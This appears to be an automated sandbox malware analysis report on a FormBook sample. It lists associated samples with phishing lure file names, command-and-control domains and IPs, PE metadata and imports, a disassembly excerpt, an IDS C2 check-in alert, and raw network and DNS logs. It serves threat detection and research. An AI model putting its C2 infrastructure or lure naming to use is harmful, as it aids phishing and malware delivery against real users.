  Request for Quotation for PTTEP - EPCC for SISGES Development Project 2.exe | malicious | FormBook | www.lexiecos.top/ff8d/
  Materials specification with quantities.exe | malicious | FormBook | www.lexiecos.top/ff8d/
  Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | www.lexiecos.top/ff8d/
  PTT request form.exe | malicious | FormBook | www.bodfun.online/wbp0/
  Request for Quotation - e092876.exe | malicious | FormBook | www.lexiecos.top/ff8d/
  PTT requested quotation.exe | malicious | FormBook | www.bodfun.online/wbp0/
  RFQ - 5002172340000.exe | malicious | FormBook | www.lexiecos.top/ff8d/
  PO Number 00127011.exe | malicious | FormBook | www.timelesszone.xyz/bf2r/
  Quotation - TB046J12LCO2 Project Mechanical.exe | malicious | FormBook | www.lexiecos.top/ff8d/
  Shipping documents.bat.exe | malicious | FormBook | www.tenblog.life/0n9h/

108.179.193.98
  Shipping documents.bat.exe | malicious | FormBook | www.siteblogoficialon.com/s9ii/
  shipping_doc.bat.exe | malicious | FormBook | www.siteblogoficialon.com/s9ii/
  SHIPPING_DOCUMENTS.exe | malicious | FormBook | www.siteblogoficialon.com/s9ii/
  SHIPPING_DOCS.bat.exe | malicious | FormBook | www.siteblogoficialon.com/s9ii/
  Maersk_Quotation034865374.exe | malicious | FormBook | www.siteblogoficialon.com/s9ii/
Match: Associated Sample Name / URL | Detection | Threat Name | Context

www.cwgehkk.store
  Shipping documents.bat.exe | malicious | FormBook | 43.155.26.241
  shipping_doc.bat.exe | malicious | FormBook | 43.155.26.241
  SHIPPING_DOCUMENTS.exe | malicious | FormBook | 43.155.26.241
  SHIPPING_DOCS.bat.exe | malicious | FormBook | 43.155.26.241
  Maersk_Quotation034865374.exe | malicious | FormBook | 43.155.26.241

www.lavillitadepapa.com
  HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | 74.208.46.171

www.kosherphonestore.com.cdn.hstgr.net
  nJ8mJTmMf0.exe | malicious | FormBook | 84.32.84.112
  DHL Arrival Notice.exe | malicious | FormBook | 154.62.106.34
  Shipping Documents.pdf.exe | malicious | FormBook | 77.37.53.194
  Salary Raise.exe | malicious | FormBook | 84.32.84.40
  Salary List.exe | malicious | FormBook | 154.41.249.175

shops.myshopify.com
  8bwKawHg0Z.exe | malicious | FormBook | 23.227.38.74
  aAEsSBx24sxHhRz.exe | malicious | FormBook | 23.227.38.74
  2024 Lusail Fence-WITH STICKER-2-003.exe | malicious | FormBook | 23.227.38.74
  Fiyat ARH-43010386.pdf2400120887000033208 'd#U0131r. PO 1310098007.exe | malicious | FormBook | 23.227.38.74
  Document TOP19928.exe | malicious | FormBook | 23.227.38.74
  eiqj38BeRo.rtf | malicious | FormBook | 23.227.38.74
  Order-1351125X.docx.doc | malicious | FormBook | 23.227.38.74
  http://outselluar.live | malicious | Unknown | 23.227.38.74
  DHL ARRIVAL DOCUMENTS.pdf.exe | malicious | FormBook | 23.227.38.74
  98790ytt.exe | malicious | FormBook | 23.227.38.74
Match: Associated Sample Name / URL | Detection | Threat Name | Context

LILLY-ASUS
  d8gZVaN0ms.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, Stealc, Vidar | 43.153.49.49
  RR1h1iO6W2.exe | malicious | FormBook | 43.132.189.227
  watchdog.elf | malicious | Mirai | 40.4.14.73
  pKqvOdh3Sv.elf | malicious | Mirai, Moobot | 43.220.27.106
  94.156.79.133-mips-2024-07-01T19_26_38.elf | malicious | Mirai, Gafgyt | 40.41.25.80
  mirai.mips.elf | malicious | Mirai | 43.111.122.206
  setup.exe | malicious | LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, SmokeLoader, Stealc | 43.153.49.49
  https://www.exactcollisionllc.com/ | malicious | Unknown | 43.175.135.229
  16bfcGvz5N.elf | malicious | Unknown | 40.165.120.84
  o85sjrF5oi.elf | malicious | Unknown | 42.173.108.47

VNPT-AS-VNVNPTCorpVN
  MUdeeReQ5R.exe | malicious | FormBook | 203.161.43.228
  7RsDGpyOQk.exe | malicious | FormBook | 203.161.41.205
  RR1h1iO6W2.exe | malicious | FormBook | 203.161.49.220
  SOA 020724.exe | malicious | FormBook | 203.161.49.220
  RW-TS-Payment204_A3084_04893_D4084_Y5902_CE3018_S4081_W30981.exe | malicious | PureLog Stealer, zgRAT | 203.161.46.44
  Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe | malicious | FormBook | 203.161.49.220
  Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exe | malicious | FormBook | 203.161.49.220
  file.exe | malicious | FormBook | 203.161.43.228
  Inquiry No PJO-4010574.exe | malicious | FormBook | 203.161.49.220
  je7RnKrgQO.exe | malicious | PureLog Stealer, zgRAT | 203.161.46.44

UNIFIEDLAYER-AS-1US
  MUdeeReQ5R.exe | malicious | FormBook | 162.240.81.18
  kZa81nzREg.exe | malicious | AgentTesla | 162.241.62.63
  https://link.mail.beehiiv.com/ls/click?upn=u001.I67xw9O-2FCIng4d3bGWl4wF1gb7u7ov5hHZyE-2Bbx9UTzw17nXfIKdJcwxuwzDNoy2zqPLSJo-2BNEQCUif7aqDwom-2FNyeTx4oiB0wLXwXnzsK4D0yrlxIKEkPM7Cj-2FHMmK1N5sLNWwmlbyGbHeuv6ehAEECnEs6fFQOqqwD-2FKToPwl8ZCnBHVdQ3QU8RWhloPcfXcxa_hzdxOAnI3B-2BYhj5tgQXSRCdoGEcuM88dXETG-2BahO6Uvd8cr2jZPTzAVk72oAubAHPgVJjhCdU6bjbXnflniNIkDzPhLxyvQL1dSWfR-2BUbH1DS3LUwJipSkZoP8d1ryYR0TIdt5CyNutkaFy6gLHYcR4kl-2Fz1ezOldYW2WX0ghZl4CCdgYPK2Cj3fM7MmBqLOIY-2B5u5WgDkBzfdFRbwHzvpAejc0JJJ7tYmz-2BUzjH-2BoYmk-2F0HGjFVUaYNWyGnhGX4EhZzw6qOcJEaxZhVjnDpWPL3U5gs5ZetaaeYkMX5whQyh7U-2B0b4Qj0LqFla1tJlWVR4EZMTu40FIJ9BSbWnjEcc9JxuCrqAu48-2BpVmjPzA43qg6bd2x0AWoed1RbQeWVzBT648qZJ7L-2FqgKPY6ysg2U7IBuGeVI7oxhhKCbXSZln5jVQGdCxXpADLZSMla5T1Id6eeDoJeYo7zr6VqE6vw-3D-3D#aGFydG11dC5zY2htaWR0QGtwcy1jb25zdWx0aW5nLmNvbQ== | malicious | Unknown | 69.49.230.170
  7RsDGpyOQk.exe | malicious | FormBook | 162.240.81.18
  TRANEXAMIC ACID & CAMPHANEDIOL SPECIFICATIONS.exe | malicious | AgentTesla | 192.254.225.136
  awb_shipping_post_02072024224782020031808174CN18020724000000224(991KB).vbs | malicious | GuLoader | 192.185.217.247
  _Account Receipt.PDF.exe | malicious | AgentTesla | 192.185.143.105
  PO-2024)bekotas.pdf.exe | malicious | AgentTesla | 108.167.140.123
  https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT | malicious | HTMLPhisher | 162.241.62.33
  DHL_AWB 98776013276.xls | malicious | FormBook | 192.185.89.92
                                              No context
                                              No context
Process: C:\Windows\SysWOW64\findstr.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.121297215059106
Encrypted: false
SSDEEP: 384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5: D87270D0039ED3A5A72E7082EA71E305
SHA1: 0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256: F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512: 18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious: false
Reputation: high, very likely benign file
                                              Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit): 7.04251611082169
TrID:
• Win64 Executable Console Net Framework (206006/5) 48.58%
• Win64 Executable Console (202006/5) 47.64%
• Win64 Executable (generic) (12005/4) 2.83%
• Generic Win/DOS Executable (2004/3) 0.47%
• DOS Executable Generic (2002/1) 0.47%
File name: GJRX21GBj3.exe
File size: 1'951'744 bytes
MD5: 804cc1b2769f38027fd2c2bf8141013b
SHA1: b75af1f4f65b7f12ba311c3c14c67642c0898fb8
SHA256: 04ca4f891cf5c2c412c58340ec0de521f940f4b36c1b0b7f1aa1fdae080922aa
SHA512: 23bac15afc3528c7f23128d50c2e817ebec00c32e28f28bd54d1194d422cdfd2f936ae840224c0f096c741d135253a265406394b8e2847ae29a0cfed4a045e38
SSDEEP: 49152:/OD+bTI6YTDml4HJPHDQkOBU0f9iygcrxZ3aU5ZeIrRo2ht171fvkTQmtPI5:ev85oQmtg
TLSH: B695BE15E3E801A8E577EB34CA629333CAB1B8661730E58F065CD2451F73EA19B7B316
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.x...+...+...+^..*...+^..*...+^..*...+.b.+...+.b.*...+...+o..+n..*...+n..*...+...+...+n..*...+...*...+...*...+Rich...+.......
Icon Hash: 00928e8e8686b000
Entrypoint: 0x140060b78
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows cui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp: 0x667A0914 [Tue Jun 25 00:02:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 8f2ed59ffaf0389477f5411c8b4c37fd
                                              Instruction
                                              dec eax
                                              sub esp, 28h
                                              call 00007FB4C082D2C4h
                                              dec eax
                                              add esp, 28h
                                              jmp 00007FB4C082CB17h
                                              int3
                                              int3
                                              jmp 00007FB4C082D650h
                                              int3
                                              int3
                                              int3
                                              dec eax
                                              sub esp, 28h
                                              dec ebp
                                              mov eax, dword ptr [ecx+38h]
                                              dec eax
                                              mov ecx, edx
                                              dec ecx
                                              mov edx, ecx
                                              call 00007FB4C082CCB2h
                                              mov eax, 00000001h
                                              dec eax
                                              add esp, 28h
                                              ret
                                              int3
                                              int3
                                              int3
                                              inc eax
                                              push ebx
                                              inc ebp
                                              mov ebx, dword ptr [eax]
                                              dec eax
                                              mov ebx, edx
                                              inc ecx
                                              and ebx, FFFFFFF8h
                                              dec esp
                                              mov ecx, ecx
                                              inc ecx
                                              test byte ptr [eax], 00000004h
                                              dec esp
                                              mov edx, ecx
                                              je 00007FB4C082CCB5h
                                              inc ecx
                                              mov eax, dword ptr [eax+08h]
                                              dec ebp
                                              arpl word ptr [eax+04h], dx
                                              neg eax
                                              dec esp
                                              add edx, ecx
                                              dec eax
                                              arpl ax, cx
                                              dec esp
                                              and edx, ecx
                                              dec ecx
                                              arpl bx, ax
                                              dec edx
                                              mov edx, dword ptr [eax+edx]
                                              dec eax
                                              mov eax, dword ptr [ebx+10h]
                                              mov ecx, dword ptr [eax+08h]
                                              dec eax
                                              mov eax, dword ptr [ebx+08h]
                                              test byte ptr [ecx+eax+03h], 0000000Fh
                                              je 00007FB4C082CCADh
                                              movzx eax, byte ptr [ecx+eax+03h]
                                              and eax, FFFFFFF0h
                                              dec esp
                                              add ecx, eax
                                              dec esp
                                              xor ecx, edx
                                              dec ecx
                                              mov ecx, ecx
                                              pop ebx
                                              jmp 00007FB4C082CCB6h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              nop word ptr [eax+eax+00000000h]
                                              dec eax
                                              cmp ecx, dword ptr [00169919h]
                                              jne 00007FB4C082CCB2h
                                              dec eax
                                              rol ecx, 10h
                                              test cx, FFFFh
                                              jne 00007FB4C082CCA3h
                                              ret
                                              dec eax
                                              ror ecx, 10h
                                              jmp 00007FB4C082CF37h
                                              int3
                                              Programming Language:
                                              • [IMP] VS2008 SP1 build 30729
Name                                    Virtual Address   Virtual Size   Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT            0x1c6da0          0x58           .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT            0x1c6df8          0xf0           .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE          0x1e8000          0x42ef4        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION         0x1d7000          0x107dc        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY          0x0               0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC         0x22b000          0x570          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG             0x1a4fb0          0x54           .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT         0x0               0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR         0x0               0x0
IMAGE_DIRECTORY_ENTRY_TLS               0x1a5180          0x28           .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG       0x1a4e70          0x140          .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT      0x0               0x0
IMAGE_DIRECTORY_ENTRY_IAT               0x159000          0x730          .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT      0x0               0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR    0x0               0x0
IMAGE_DIRECTORY_ENTRY_RESERVED          0x0               0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x655d8 | 0x65600 | a83f1f68413cc5604ea156c8e93e3b1a | False | 0.45910960619605423 | data | 6.657947877840493 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed | 0x67000 | 0xb1c88 | 0xb1e00 | 7b21ac36faefbbd8cf5ba1dba17ccad1 | False | 0.46262023453970486 | data | 6.453352722930797 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated | 0x119000 | 0x3f130 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x159000 | 0x6f824 | 0x6fa00 | 9aea8f55921091b9c8265e5f5a3d9885 | False | 0.4840972319428891 | zlib compressed data | 6.509656732765877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1c9000 | 0xd488 | 0x1800 | f9836cce0b2cf07524bb2892ecd5dfca | False | 0.20686848958333334 | data | 2.944302619462605 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1d7000 | 0x107dc | 0x10800 | 45a3194d8cdb409c1eb277bf8de8bbc5 | False | 0.4964044744318182 | data | 6.150240338049358 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1e8000 | 0x42ef4 | 0x43000 | aaf38292e2378db6252c4a1898950311 | False | 0.9966439773787313 | data | 7.998308580921455 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x22b000 | 0x570 | 0x600 | 5545a2e51f7a2893c697b39a79ed20ed | False | 0.5950520833333334 | data | 5.168122039701614 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
BINARY | 0x1e810c | 0x42884 | data | | | 1.0003339253475025
RT_VERSION | 0x22a990 | 0x378 | data | | | 0.35923423423423423
RT_MANIFEST | 0x22ad08 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
ADVAPI32.dll | AdjustTokenPrivileges, CreateWellKnownSid, DeregisterEventSource, DuplicateTokenEx, GetSecurityDescriptorLength, GetTokenInformation, GetWindowsAccountDomainSid, LookupPrivilegeValueW, OpenProcessToken, OpenThreadToken, RegCloseKey, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteTreeW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegFlushKey, RegOpenKeyExW, RegQueryInfoKeyW, RegQueryValueExW, RegSetValueExA, RegSetValueExW, RegisterEventSourceW, ReportEventW, RevertToSelf, SetThreadToken
bcrypt.dll | BCryptOpenAlgorithmProvider, BCryptCloseAlgorithmProvider, BCryptDecrypt, BCryptDestroyKey, BCryptGenRandom
KERNEL32.dll | TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, AllocConsole, CancelThreadpoolIo, CloseHandle, CloseThreadpoolIo, CopyFileExW, CreateDirectoryW, CreateEventExW, CreateFileW, CreateProcessA, CreateSymbolicLinkW, CreateThreadpoolIo, DeleteCriticalSection, DeleteFileW, DeleteVolumeMountPointW, DeviceIoControl, DuplicateHandle, EnterCriticalSection, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FormatMessageW, FreeConsole, FreeLibrary, GetCPInfo, GetConsoleOutputCP, GetConsoleWindow, GetCurrentProcess, GetCurrentProcessId, GetCurrentProcessorNumberEx, GetCurrentThread, GetDynamicTimeZoneInformation, GetEnvironmentVariableW, GetFileAttributesExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileType, GetFinalPathNameByHandleW, GetFullPathNameW, GetLastError, GetLogicalDrives, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleA, GetOverlappedResult, GetProcAddress, GetStdHandle, GetSystemTime, GetThreadPriority, GetTickCount64, GetTimeZoneInformation, GetVolumeInformationW, InitializeConditionVariable, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryExW, LocalAlloc, LocalFree, MoveFileExW, MultiByteToWideChar, QueryPerformanceCounter, QueryPerformanceFrequency, RaiseFailFastException, ReadFile, RemoveDirectoryW, ReplaceFileW, ResetEvent, ResumeThread, SetEvent, SetFileAttributesW, SetFileInformationByHandle, SetLastError, SetThreadErrorMode, SetThreadPriority, Sleep, SleepConditionVariableCS, StartThreadpoolIo, SystemTimeToFileTime, TzSpecificLocalTimeToSystemTime, VirtualAlloc, VirtualFree, WaitForMultipleObjectsEx, WakeConditionVariable, WideCharToMultiByte, WriteFile, FlushProcessWriteBuffers, WaitForSingleObjectEx, RtlVirtualUnwind, RtlCaptureContext, RtlRestoreContext, VerSetConditionMask, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, SwitchToThread, CreateThread, GetCurrentThreadId, SuspendThread, GetThreadContext, SetThreadContext, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, VerifyVersionInfoW, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, VirtualQuery, GetSystemTimeAsFileTime, InitializeCriticalSectionEx, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, InitializeSListHead, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlLookupFunctionEntry
ole32.dll | CoWaitForMultipleHandles, CoGetApartmentType, CoCreateGuid, CoInitializeEx, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc
api-ms-win-crt-math-l1-1-0.dll | __setusermatherr, modf, ceil
api-ms-win-crt-heap-l1-1-0.dll | _callnewh, free, _set_new_mode, calloc, malloc
api-ms-win-crt-string-l1-1-0.dll | strcmp, wcsncmp, _stricmp, strcpy_s
api-ms-win-crt-convert-l1-1-0.dll | strtoull
api-ms-win-crt-runtime-l1-1-0.dll | abort, _c_exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, _seh_filter_exe, _set_app_type, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment, _register_thread_local_exe_atexit_callback, _initterm_e, exit, _exit, _initterm, __p___argc, __p___wargv, _cexit
api-ms-win-crt-stdio-l1-1-0.dll | _set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
Name | Ordinal | Address
DotNetRuntimeDebugHeader | 1 | 0x1401c9b90
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/03/24-16:39:32.243675 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49711 | 80 | 192.168.2.5 | 23.227.38.74
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Jul 3, 2024 16:41:45.982606888 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.986387014 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:45.991519928 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:45.991533995 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.698823929 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702044010 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702091932 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:46.702548027 CEST804973635.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:46.702604055 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:47.485814095 CEST4973680192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.567806959 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.693413019 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:48.693489075 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.696413040 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:48.702730894 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.340217113 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355428934 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355463982 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355475903 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355639935 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.355667114 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355676889 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.355732918 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.355813980 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.357033968 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:49.358762026 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.362293959 CEST4973780192.168.2.535.241.34.216
                                              Jul 3, 2024 16:41:49.367209911 CEST804973735.241.34.216192.168.2.5
                                              Jul 3, 2024 16:41:54.401077986 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.406097889 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.406248093 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.409286022 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:54.414536953 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940505028 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940727949 CEST804973874.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:54.940776110 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:55.924299002 CEST4973880192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.943294048 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.948288918 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:56.948369026 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.950323105 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:56.955842018 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.469104052 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.469856024 CEST804973974.208.46.171192.168.2.5
                                              Jul 3, 2024 16:41:57.470074892 CEST4973980192.168.2.574.208.46.171
                                              Jul 3, 2024 16:41:58.829282999 CEST4973980192.168.2.574.208.46.171
                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 3, 2024 16:39:26.747170925 CEST5828353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:26.880378008 CEST53582831.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:31.895854950 CEST6215753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:32.223649979 CEST53621571.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:47.864443064 CEST5477853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:47.891410112 CEST53547781.1.1.1192.168.2.5
                                              Jul 3, 2024 16:39:55.958302021 CEST6464653192.168.2.51.1.1.1
                                              Jul 3, 2024 16:39:55.996679068 CEST53646461.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:09.101967096 CEST5018853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:09.577852011 CEST53501881.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:43.583199024 CEST4958453192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:43.620145082 CEST53495841.1.1.1192.168.2.5
                                              Jul 3, 2024 16:40:56.786376953 CEST6329853192.168.2.51.1.1.1
                                              Jul 3, 2024 16:40:57.133352041 CEST53632981.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:10.413326979 CEST5428353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:10.734431028 CEST53542831.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:24.240782976 CEST5266753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:24.251256943 CEST53526671.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:32.318276882 CEST5827553192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:32.329464912 CEST53582751.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:40.397211075 CEST5857753192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:40.880045891 CEST53585771.1.1.1192.168.2.5
                                              Jul 3, 2024 16:41:54.380162001 CEST6247353192.168.2.51.1.1.1
                                              Jul 3, 2024 16:41:54.397344112 CEST53624731.1.1.1192.168.2.5
                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 3, 2024 16:39:26.747170925 CEST192.168.2.51.1.1.10x602aStandard query (0)www.gospelstudygroup.orgA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:31.895854950 CEST192.168.2.51.1.1.10xa06aStandard query (0)www.valerieomage.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:47.864443064 CEST192.168.2.51.1.1.10x4e0bStandard query (0)www.instantmailer.cloudA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:39:55.958302021 CEST192.168.2.51.1.1.10xaec6Standard query (0)www.kosherphonestore.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:09.101967096 CEST192.168.2.51.1.1.10xbc2cStandard query (0)www.cwgehkk.storeA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:43.583199024 CEST192.168.2.51.1.1.10x873dStandard query (0)www.mybodyradar.netA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:40:56.786376953 CEST192.168.2.51.1.1.10x27b7Standard query (0)www.lacemalt.topA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:10.413326979 CEST192.168.2.51.1.1.10x4640Standard query (0)www.siteblogoficialon.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:24.240782976 CEST192.168.2.51.1.1.10xee4eStandard query (0)www.mcxright.comA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:32.318276882 CEST192.168.2.51.1.1.10xcc8dStandard query (0)www.amkmos.onlineA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:40.397211075 CEST192.168.2.51.1.1.10x1b0fStandard query (0)www.mg55aa.xyzA (IP address)IN (0x0001)false
                                              Jul 3, 2024 16:41:54.380162001 CEST192.168.2.51.1.1.10x831bStandard query (0)www.lavillitadepapa.comA (IP address)IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
